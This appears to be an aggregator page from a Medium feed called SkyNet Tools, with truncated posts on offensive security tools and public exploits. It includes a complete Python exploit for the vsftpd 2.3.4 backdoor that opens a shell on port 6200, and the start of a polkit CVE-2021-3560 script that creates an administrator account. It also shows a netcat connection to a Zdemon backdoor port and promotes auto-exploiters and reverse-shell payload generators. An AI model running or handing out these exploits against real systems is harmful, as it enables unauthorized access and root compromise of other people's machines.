More @ https://skynettools.com

The malware Zdemon listens on TCP ports 31556, 6051. Third-party attackers who can reach infected systems can execute commands made available by the backdoor.

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/d12f38e959d70af76fd263aa1933033c.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Zdemon.10
Vulnerability: Unauthenticated Remote Command Execution
Description: Zdemon malware listens on TCP ports 31556, 6051. Third-party attackers who can reach infected systems can execute commands made available by the backdoor.
Type: PE32
MD5: d12f38e959d70af76fd263aa1933033c
Vuln ID: MVID-2021-0313
Disclosure: 08/05/2021

Exploit/PoC:
nc64.exe x.x.x.x 31556
001
112
112Victim 01
1.11002
002 [ PC Details ]

User name : Victim
Computer name : DESKTOP-2C3IQHO
Registered owner :
Registered organisation :
Processor name : Intel64 Family…

Traitor - Automatically Exploit Low-Hanging Fruit For A Root Shell. Linux Privilege Escalation Made Easy
Traitor - Automatically Exploit Low-Hanging Fruit For A Root Shell. Linux Privilege Escalation Made Easy

Traitor packages up a bunch of methods to exploit local misconfigurations and vulnerabilities (including most of GTFOBins) in order to pop a root shell.

It’ll exploit most sudo privileges listed in GTFOBins to pop a root shell, as well as exploiting issues like a writable docker.sock, or the recent polkit CVE-2021–3560. More routes to root will be added over time too.

Usage

Run with no arguments to find potential vulnerabilities/misconfigurations which could allow privilege escalation. Add the -p flag if the current user password is known. The password will be requested if it’s needed to analyse sudo permissions etc.

traitor -p


Polkit Version 0.105–26 0.117–2 Suffers a Local Privilege Escalation (LPE) exploit. This exploit allows an unprivileged user to gain root access to the Linux system. Updating the system is recommended to avoid exploitation.

More @ https://skynettools.com/

# Exploit Title: Polkit 0.105-26 0.117-2 - Local Privilege Escalation
# Date: 06/11/2021
# Exploit Author: J Smith (CadmusofThebes)
# Vendor Homepage: https://www.freedesktop.org/
# Software Link: https://www.freedesktop.org/software/polkit/docs/latest/polkitd.8.html
# Version: polkit 0.105-26 (Ubuntu), polkit 0.117-2 (Fedora)
# Tested on: Ubuntu 20.04, Fedora 33
# CVE: CVE-2021-3560
# Source: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/

#!/bin/bash

# Set the name and display name
userName="hacked"
realName="hacked"

# Set the account as an administrator
accountType=1

# Set the password hash for 'password' and password hint
password='$5$WR3c6uwMGQZ/JEZw$OlBVzagNJswkWrKRSuoh/VCrZv183QpZL7sAeskcoTB'
passHint="password"

# Check Polkit…


HostHunter v1.5 - Discover & Extract Hostnames Providing a Large Set of Target IP Addresses
HostHunter v1.5 - Discover & Extract Hostnames Providing a Large Set of Target IP Addresses

A tool to efficiently discover and extract hostnames providing a large set of target IP addresses. HostHunter utilises simple OSINT techniques to map IP addresses with virtual hostnames. It generates a CSV or TXT file containing the results of the reconnaissance.

Latest version of HostHunter also takes screenshots of the targets, it is currently a beta functionality.

Installation

- Tested with Python 3.7.2.

Linux / Mac OS

- Install python dependencies.

$ pip3 install -r requirements.txt

The next few steps are only required if you would like to use the Screen Capture feature.

- Download and install the latest version of…


Vulnnr - Vulnerability Scanner & Auto Exploiter
Vulnnr - Vulnerability Scanner & Auto Exploiter

Create a target list or select one target, scans then exploits, done!
Vulnnr is a Vulnerability Scanner & Auto Exploiter You can use this tool to check the security by finding the vulnerability in your website or you can use this tool to Get Shells

Offers

LFI Scanners > Coming soon

XSS Scanners > Working

SQLI injection scanners > Working

Domain Scanner > Using hackerone API/finds subdoamins

CMS detector > Working

Server detector > Working

Common vulnerable files Scanner > Working

Directory Spider/Scanner > Working

Dorker > Working/Uses Googles search engine/ auto exploits

Autodorker > Working takes a list full of dorks (Dont recommend using)

Vulnscan > Scans one target

Vulnauto >…


More at https://skynettools.com

# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 9-04-2021
# Exploit Author: HerculesRD
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523

#!/usr/bin/python3

from telnetlib import Telnet
import argparse
from signal import signal, SIGINT
from sys import exit

def handler(signal_received, frame):
# Handle any cleanup here
print(' [+]Exiting...')
exit(0)

signal(SIGINT, handler)
parser=argparse.ArgumentParser()
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()
host = args.host
portFTP = 21 #if necessary edit this line

user="USER nergal:)"
password="PASS pass"

tn=Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.") #if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")

tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()

More at https://skynettools.com

# Exploit Title: ExpressVPN VPN Router 1.0 - Router Login Panel's Integer Overflow
# Date: 09-04-2021
# Exploit Author: Jai Kumar Sharma
# Vendor Homepage: https://www.expressvpn.com/
# Software Link: https://www.expressvpn.com/vpn-software/vpn-router
# Version: version 1
# Tested on: Windows/Ubuntu/MacOS
# CVE : CVE-2020-29238

*Proof of concept*:

ExpressVPN Router's Login Panel runs on Nginx webserver, the version v1 of the router's firmware hosts web login panel on vulnerable web server

ExpressVPN Summary: A publicly known bug in the Nginx server used by the ExpressVPN Router version 1.x firmware was reported. ExpressVPN no longer ships or supports that version and all users are encouraged to upgrade to the latest version…

AVAIN - Automated Vulnerability Analysis (in) IP-based Networks
AVAIN - Automated Vulnerability Analysis (in) IP-based Networks

About

AVAIN is a modular vulnerability analysis / penetration testing framework for computer networks and individual machines that allows its modules to work collaboratively to achieve more sophisticated results. Once you start an analysis with AVAIN, it uses its modules to enumerate, find vulnerabilities and assess the overall security level of an IP-based network or host. During the analysis, the most relevant results are shown directly in a comprehensible way. The complete and in depth results are saved for later to enable the user to fully retrace the assessment. In addition, AVAIN automatically aggregates certain types of results during the analysis…


LAZYPARIAH - Low-Dependency CLI Tool for Generating Reverse Shell Payloads
LAZYPARIAH - Low-Dependency CLI Tool for Generating Reverse Shell Payloads

LAZYPARIAH is a simple and easily installable command-line tool written in pure Ruby that can be used during penetration tests and capture-the-flag (CTF) competitions to generate a range of reverse shell payloads on the fly.

The reverse shell payloads that LAZYPARIAH supports include (but are not limited to):

- C binary payloads (compiled on the fly): c_binary, c_binary_b64, c_binary_gzip, c_binary_gzip_b64, c_binary_hex, c_binary_gzip_hex

- Ruby payloads: ruby, ruby_b64, ruby_hex, ruby_c

- Base64-encoded Python payloads: python_b64

- Rust binary payloads (compiled on the fly): rust_binary, rust_binary_b64, rust_binary_gzip, rust_binary_gzip_b64, rust_binary_gzip_hex, rust_binary_hex

- PHP scripts containing base64-encoded Python payloads called via the system() function: php_system_python_b64

- Java classes (compiled…

SkyNet Tools

Providing the Latest #Infosec #News, #Tools, and #Exploits

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store